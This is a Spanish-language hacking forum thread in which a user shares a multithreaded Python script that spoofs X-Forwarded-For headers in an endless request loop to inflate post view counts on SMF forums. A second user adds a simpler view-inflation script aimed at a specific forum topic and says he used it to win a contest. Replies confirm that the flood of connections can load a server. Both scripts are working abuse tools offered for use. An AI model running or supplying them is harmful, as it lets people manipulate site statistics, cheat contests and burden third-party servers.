(http://i61.tinypic.com/161gbj7.png)
(http://i62.tinypic.com/rvd74g.png)
(http://i60.tinypic.com/2w7i92u.png)
(http://i58.tinypic.com/2cnzfhf.png)
#!/usr/bin/python
# RemoteExecution
#Autor: Daniel Godoy A.K.A hielasangre
import sys, threading, time, urllib2,re
print "Ingrese URL: "
url = raw_input()
a = b = c = d = 1
count = 0
class SMFPwner(threading.Thread):
def __init__(self, num):
threading.Thread.__init__(self)
self.num = num
def run(self):
while 1:
global a,b,c,d,count, url
data = ""
while 1:
while 1:
if d!=250:
d+=1
else:
if c!= 250:
c+=2
d=0
else:
if b!=250:
c=0
d=0
b+=1
else:
a+=1
b=0
c=0
d=0
head = str(a)+'.'+str(b)+'.'+str(c)+'.'+str(d)
headers = { 'X-Forwarded-For' : head }
req = urllib2.Request(url, data, headers)
f = urllib2.urlopen(req)
count += 1
print "[ Visitando => " + url + " Por " + str(count) +" vez ]"
for i in range(3):
ta = SMFPwner(i)
ta.start()
Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.
Fuente: http://foro.remoteexecution.net
Muy bueno hielasangre!!
Te hago una pregunta, esto genera sobrecarga en el servidor?
Abrazo!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Muy bueno hielasangre!!
Te hago una pregunta, esto genera sobrecarga en el servidor?
Abrazo!
Todo depende de como este configurado, pero si porque son múltiples conexiones! Igual, si tenes un cloudflare en el medio lo mitiga automáticamente :)
Gracias puedo usar el codigo para hacer una aplicacion claro coloco tu credito. Y te paso por MP el source final.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Si bien no es una vulnerabilidad comprometedora, nos permite promocionar entre los primeros puestos (estadísticas) a nuestros posts, de manera arbitraria... Lo cual al menos, resulta divertido.
No lo tomo como insulto, pero ahí lo respondí. Yo mismo se que es inútil, es verdad quizás el post debería ser borrado.. A lo mejor perdí mi tiempo no lo se, pero a lo mejor a otro le guste... En fin es cuestión de gustos! Lo use para un PoC
Como dije, todo va en cada uno.. http://es.1337day.com/exploit/description/15699
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Gracias puedo usar el codigo para hacer una aplicacion claro coloco tu credito. Y te paso por MP el source final.
Dale que va, no interesan los creditos! Lo que interesa es que te sea útil!
Creo que cualquier código es de agradecer, una cosa que no entendí, ¿que es la cabecera X-Forwarded-For?
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Creo que cualquier código es de agradecer, una cosa que no entendí, ¿que es la cabecera X-Forwarded-For?
http://en.wikipedia.org/wiki/X-Forwarded-For
Grande dani. Gracias por compartir. Y como decia un gran amigo mio, "a la gilada ni cabida, yo la miro desde arriba".
Ya lo probe :3 xD jajajaj interesante el script mil maneras de trollear :D
PD: Lo piratee para mi blog! ;)
Regards,
Snifer
Genial brother, esto lo usé hace algún tiempo para ganar un concurso en otro foro. Aunque no es necesario complicarse con el X-Forwarded-For, este es el code que usé (lo probé acá en Underc0de y aún funciona) por si le sirve a alguien más para algo.
import time
import urllib2
class Pvisits(object):
def __init__(self, url, nvisitas, delay=0):
headers = {
"Referer": url,
"User-Agent": "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
}
for x in xrange(nvisitas):
time.sleep(delay)
request = urllib2.Request(url, headers=headers)
obj_web = urllib2.urlopen(request)
codigo = obj_web.code
if codigo == 200:
print obj_web.geturl(), codigo, nvisitas - x
elif codigo >= 400:
print "Ocurrio un error:", codigo
return
Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)
Saludos!
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Genial brother, esto lo usé hace algún tiempo para ganar un concurso en otro foro. Aunque no es necesario complicarse con el X-Forwarded-For, este es el code que usé (lo probé acá en Underc0de y aún funciona) por si le sirve a alguien más para algo.
import time
import urllib2
class Pvisits(object):
def __init__(self, url, nvisitas, delay=0):
headers = {
"Referer": url,
"User-Agent": "Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00",
}
for x in xrange(nvisitas):
time.sleep(delay)
request = urllib2.Request(url, headers=headers)
obj_web = urllib2.urlopen(request)
codigo = obj_web.code
if codigo == 200:
print obj_web.geturl(), codigo, nvisitas - x
elif codigo >= 400:
print "Ocurrio un error:", codigo
return
Pvisits("http://underc0de.org/foro/index.php?topic=22799.0", 20, 0)
Saludos!
OPAAAAA :D Muy bueno! Hay que estudiar mas SMF me parece entonces :P
Muy buen aporte, como dice hielasangre, me parece que vamos a tener que estudiar mas smf jajaja